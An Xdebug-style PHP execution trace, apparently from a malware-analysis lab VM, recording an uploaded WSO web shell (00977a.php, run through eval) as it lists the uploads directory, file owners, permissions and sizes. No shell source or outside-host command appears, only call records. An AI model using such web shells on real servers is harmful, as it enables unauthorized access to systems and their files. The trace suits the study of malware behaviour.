4	131	1	0.013091	1153112
4	131	R			0
4	132	0	0.013104	1153072	posix_getpwuid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	1	0
4	132	1	0.013129	1153872
4	132	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	133	0	0.013171	1153088	filegroup	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	1	'data'
4	133	1	0.013185	1153128
4	133	R			0
4	134	0	0.013198	1153088	posix_getgrgid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	1	0
4	134	1	0.013221	1153744
4	134	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	135	0	0.013258	1153608	filemtime	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1282	1	'/var/www/html/uploads/data'
4	135	1	0.013274	1153672
4	135	R			1676255550
4	136	0	0.013287	1153576	date	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1282	2	'Y-m-d H:i:s'	1676255550
4	136	1	0.013319	1153904
4	136	R			'2023-02-12 21:32:30'
4	137	0	0.013334	1153888	wsoPermsColor	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1284	1	'/var/www/html/uploads/data'
5	138	0	0.013348	1153888	is_readable	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	704	1	'/var/www/html/uploads/data'
5	138	1	0.013364	1153928
5	138	R			TRUE
5	139	0	0.013377	1153888	is_writable	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	708	1	'/var/www/html/uploads/data'
5	139	1	0.013393	1153928
5	139	R			TRUE
5	140	0	0.013405	1153888	fileperms	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	714	1	'/var/www/html/uploads/data'
5	140	1	0.013419	1153928
5	140	R			16895
5	141	0	0.013432	1153888	wsoPerms	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	714	1	16895
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	671	$i = 'd'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	679	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	681	$i .= 'w'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	683	$i .= 'x'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	685	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	687	$i .= 'w'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	689	$i .= 'x'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	691	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	693	$i .= 'w'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	695	$i .= 'x'
5	141	1	0.013550	1153928
5	141	R			'drwxrwxrwx'
4	137	1	0.013564	1153952
4	137	R			'<font color=#25ff00>drwxrwxrwx</font>'
4	142	0	0.013581	1153952	filesize	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1286	1	'/var/www/html/uploads/data'
4	142	1	0.013595	1153992
4	142	R			4096
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1290	$tmp = ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
4	143	0	0.013631	1153576	is_file	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1294	1	'/var/www/html/uploads/data'
4	143	1	0.013649	1153616
4	143	R			FALSE
4	144	0	0.013663	1153576	is_link	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1298	1	'/var/www/html/uploads/data'
4	144	1	0.013679	1153616
4	144	R			FALSE
4	145	0	0.013692	1153576	is_dir	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1302	1	'/var/www/html/uploads/data'
4	145	1	0.013706	1153616
4	145	R			TRUE
4	146	0	0.013719	1153520	array_merge	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1304	2	['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']	['type' => 'dir']
4	146	1	0.013742	1153960
4	146	R			['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1304	$dirs[] = ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1272	$i++
4	147	0	0.013801	1153896	fileowner	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	1	'prepend.php'
4	147	1	0.013816	1153920
4	147	R			0
4	148	0	0.013829	1153880	posix_getpwuid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	1	0
4	148	1	0.013853	1154680
4	148	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	149	0	0.013894	1153912	filegroup	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	1	'prepend.php'
4	149	1	0.013908	1153952
4	149	R			0
4	150	0	0.013921	1153912	posix_getgrgid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	1	0
4	150	1	0.013942	1154568
4	150	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	151	0	0.013979	1154448	filemtime	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1282	1	'/var/www/html/uploads/prepend.php'
4	151	1	0.013996	1154512
4	151	R			1676255550
4	152	0	0.014009	1154408	date	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1282	2	'Y-m-d H:i:s'	1676255550
4	152	1	0.014041	1154736
4	152	R			'2023-02-12 21:32:30'
4	153	0	0.014055	1154728	wsoPermsColor	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1284	1	'/var/www/html/uploads/prepend.php'
5	154	0	0.014070	1154728	is_readable	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	704	1	'/var/www/html/uploads/prepend.php'
5	154	1	0.014086	1154768
5	154	R			TRUE
5	155	0	0.014099	1154728	is_writable	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	708	1	'/var/www/html/uploads/prepend.php'
5	155	1	0.014115	1154768
5	155	R			FALSE
5	156	0	0.014129	1154728	fileperms	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	710	1	'/var/www/html/uploads/prepend.php'
5	156	1	0.014143	1154768
5	156	R			33261
5	157	0	0.014155	1154728	wsoPerms	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	710	1	33261
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	667	$i = '-'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	679	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	681	$i .= 'w'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	683	$i .= 'x'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	685	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	687	$i .= '-'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	689	$i .= 'x'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	691	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	693	$i .= '-'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	695	$i .= 'x'
5	157	1	0.014273	1154768
5	157	R			'-rwxr-xr-x'
4	153	1	0.014287	1154792
4	153	R			'<font color=white>-rwxr-xr-x</font>'
4	158	0	0.014307	1154792	filesize	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1286	1	'/var/www/html/uploads/prepend.php'
4	158	1	0.014322	1154832
4	158	R			57
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1290	$tmp = ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root']
4	159	0	0.014358	1154416	is_file	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1294	1	'/var/www/html/uploads/prepend.php'
4	159	1	0.014373	1154456
4	159	R			TRUE
4	160	0	0.014386	1154352	array_merge	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1296	2	['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root']	['type' => 'file']
4	160	1	0.014409	1154792
4	160	R			['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1296	$files[] = ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1272	$i++
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1308	GLOBALS['sort'] = [0 => 'name', 1 => 1]
4	161	0	0.014484	1154752	usort	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1322	2	[0 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 1 => ['name' => '00977a.php', 'path' => '/var/www/html/uploads/00977a.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 111063, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 2 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']]	'wsoCmp'
5	162	0	0.014521	1155200	wsoCmp	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1322	2	['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']	['name' => '00977a.php', 'path' => '/var/www/html/uploads/00977a.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 111063, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
6	163	0	0.014551	1155200	strtolower	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1314	1	'.htaccess'
6	163	1	0.014565	1155232
6	163	R			'.htaccess'
6	164	0	0.014580	1155200	strtolower	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1314	1	'00977a.php'
6	164	1	0.014593	1155232
6	164	R			'00977a.php'
6	165	0	0.014607	1155200	strcmp	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1314	2	'.htaccess'	'00977a.php'
6	165	1	0.014621	1155264
6	165	R			-1
5	162	1	0.014634	1155200
5	162	R			-1
5	166	0	0.014646	1155200	wsoCmp	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1322	2	['name' => '00977a.php', 'path' => '/var/www/html/uploads/00977a.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 111063, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']	['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
6	167	0	0.014675	1155200	strtolower	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1314	1	'00977a.php'
6	167	1	0.014688	1155232
6	167	R			'00977a.php'
6	168	0	0.014702	1155200	strtolower	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1314	1	'prepend.php'
6	168	1	0.014715	1155232
6	168	R			'prepend.php'
6	169	0	0.014729	1155200	strcmp	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1314	2	'00977a.php'	'prepend.php'
6	169	1	0.014743	1155264
6	169	R			-1
5	166	1	0.014756	1155200
5	166	R			-1
4	161	1	0.014769	1154824
4	161	R			TRUE
4	170	0	0.014782	1154776	usort	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1324	2	[0 => ['name' => '.', 'path' => '/var/www/html/uploads/.', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']]	'wsoCmp'
5	171	0	0.014815	1155224	wsoCmp	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1324	2	['name' => '.', 'path' => '/var/www/html/uploads/.', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']	['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
6	172	0	0.014842	1155224	strtolower	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1314	1	'.'
6	172	1	0.014855	1155256
6	172	R			'.'
6	173	0	0.014868	1155224	strtolower	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1314	1	'..'
6	173	1	0.014881	1155256
6	173	R			'..'
6	174	0	0.014894	1155224	strcmp	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1314	2	'.'	'..'
6	174	1	0.014912	1155288
6	174	R			-1
5	171	1	0.014925	1155224
5	171	R			-1
5	175	0	0.014938	1155224	wsoCmp	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1324	2	['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']	['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
6	176	0	0.014965	1155224	strtolower	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1314	1	'..'
6	176	1	0.014978	1155256
6	176	R			'..'
6	177	0	0.014991	1155224	strtolower	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1314	1	'data'
6	177	1	0.015004	1155256
6	177	R			'data'
6	178	0	0.015017	1155224	strcmp	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1314	2	'..'	'data'
6	178	1	0.015030	1155288
6	178	R			-3552051
5	175	1	0.015044	1155224
5	175	R			-3552051
4	170	1	0.015057	1154848
4	170	R			TRUE
4	179	0	0.015070	1154776	array_merge	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1326	2	[0 => ['name' => '.', 'path' => '/var/www/html/uploads/.', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']]	[0 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 1 => ['name' => '00977a.php', 'path' => '/var/www/html/uploads/00977a.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 111063, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 2 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']]
4	179	1	0.015122	1155216
4	179	R			[0 => ['name' => '.', 'path' => '/var/www/html/uploads/.', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 3 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 4 => ['name' => '00977a.php', 'path' => '/var/www/html/uploads/00977a.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 111063, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 5 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']]
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1326	$files = [0 => ['name' => '.', 'path' => '/var/www/html/uploads/.', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 3 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 4 => ['name' => '00977a.php', 'path' => '/var/www/html/uploads/00977a.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 111063, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file'], 5 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']]
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1328	$l = 0
4	180	0	0.015242	1154856	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'.'
4	180	1	0.015257	1154920
4	180	R			'.'
4	181	0	0.015271	1154984	htmlspecialchars	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'.'
4	181	1	0.015287	1155176
4	181	R			'.'
4	182	0	0.015302	1155096	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'.'
4	182	1	0.015315	1155160
4	182	R			'.'
4	183	0	0.015328	1155160	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'.'
4	183	1	0.015341	1155224
4	183	R			'.'
4	184	0	0.015354	1155224	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'.'
4	184	1	0.015367	1155288
4	184	R			'.'
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1336	$l = 1
4	185	0	0.015392	1154872	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'..'
4	185	1	0.015405	1154936
4	185	R			'..'
4	186	0	0.015419	1154984	htmlspecialchars	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'..'
4	186	1	0.015432	1155176
4	186	R			'..'
4	187	0	0.015446	1155096	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'..'
4	187	1	0.015459	1155160
4	187	R			'..'
4	188	0	0.015472	1155224	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'..'
4	188	1	0.015484	1155288
4	188	R			'..'
4	189	0	0.015497	1155288	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'..'
4	189	1	0.015509	1155352
4	189	R			'..'
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1336	$l = 0
4	190	0	0.015534	1154856	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'data'
4	190	1	0.015547	1154920
4	190	R			'data'
4	191	0	0.015561	1154984	htmlspecialchars	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'data'
4	191	1	0.015574	1155176
4	191	R			'data'
4	192	0	0.015588	1155096	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'data'
4	192	1	0.015602	1155160
4	192	R			'data'
4	193	0	0.015619	1155224	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'data'
4	193	1	0.015632	1155288
4	193	R			'data'
4	194	0	0.015645	1155288	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'data'
4	194	1	0.015657	1155352
4	194	R			'data'
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1336	$l = 1
4	195	0	0.015682	1154872	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'.htaccess'
4	195	1	0.015695	1154944
4	195	R			'.htaccess'
4	196	0	0.015709	1154936	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'.htaccess'
4	196	1	0.015722	1155008
4	196	R			'.htaccess'
4	197	0	0.015735	1155016	htmlspecialchars	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'.htaccess'
4	197	1	0.015749	1155208
4	197	R			'.htaccess'
4	198	0	0.015763	1155000	wsoViewSize	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	64
5	199	0	0.015777	1155000	sprintf	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	638	2	'%u'	64
5	199	1	0.015792	1155384
5	199	R			'64'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	638	$s = '64'
4	198	1	0.015817	1155032
4	198	R			'64 B'
4	200	0	0.015831	1155096	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'.htaccess'
4	200	1	0.015844	1155168
4	200	R			'.htaccess'
4	201	0	0.015858	1155224	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'.htaccess'
4	201	1	0.015871	1155296
4	201	R			'.htaccess'
4	202	0	0.015884	1155288	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'.htaccess'
4	202	1	0.015897	1155360
4	202	R			'.htaccess'
4	203	0	0.015911	1155288	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'.htaccess'
4	203	1	0.015924	1155360
4	203	R			'.htaccess'
4	204	0	0.015937	1155448	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'.htaccess'
4	204	1	0.015950	1155520
4	204	R			'.htaccess'
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1336	$l = 0
4	205	0	0.015975	1154856	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'00977a.php'
4	205	1	0.015989	1154928
4	205	R			'00977a.php'
4	206	0	0.016002	1154904	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'00977a.php'
4	206	1	0.016016	1154976
4	206	R			'00977a.php'
4	207	0	0.016030	1154984	htmlspecialchars	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'00977a.php'
4	207	1	0.016043	1155176
4	207	R			'00977a.php'
4	208	0	0.016057	1154968	wsoViewSize	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	111063
5	209	0	0.016071	1154968	sprintf	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	638	2	'%u'	111063
5	209	1	0.016085	1155352
5	209	R			'111063'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	638	$s = '111063'
5	210	0	0.016110	1155288	sprintf	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	652	2	'%1.2f'	108.4599609375
5	210	1	0.016126	1155672
5	210	R			'108.46'
4	208	1	0.016139	1155008
4	208	R			'108.46 KB'
4	211	0	0.016153	1155096	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'00977a.php'
4	211	1	0.016167	1155168
4	211	R			'00977a.php'
4	212	0	0.016181	1155224	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'00977a.php'
4	212	1	0.016194	1155296
4	212	R			'00977a.php'
4	213	0	0.016207	1155288	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'00977a.php'
4	213	1	0.016220	1155360
4	213	R			'00977a.php'
4	214	0	0.016233	1155288	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'00977a.php'
4	214	1	0.016246	1155360
4	214	R			'00977a.php'
4	215	0	0.016259	1155448	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'00977a.php'
4	215	1	0.016271	1155520
4	215	R			'00977a.php'
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1336	$l = 1
4	216	0	0.016301	1154872	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'prepend.php'
4	216	1	0.016315	1154944
4	216	R			'prepend.php'
4	217	0	0.016329	1154936	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'prepend.php'
4	217	1	0.016342	1155008
4	217	R			'prepend.php'
4	218	0	0.016355	1155016	htmlspecialchars	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'prepend.php'
4	218	1	0.016369	1155208
4	218	R			'prepend.php'
4	219	0	0.016383	1155000	wsoViewSize	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	57
5	220	0	0.016396	1155000	sprintf	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	638	2	'%u'	57
5	220	1	0.016410	1155384
5	220	R			'57'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	638	$s = '57'
4	219	1	0.016435	1155032
4	219	R			'57 B'
4	221	0	0.016449	1155096	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1332	1	'prepend.php'
4	221	1	0.016462	1155168
4	221	R			'prepend.php'
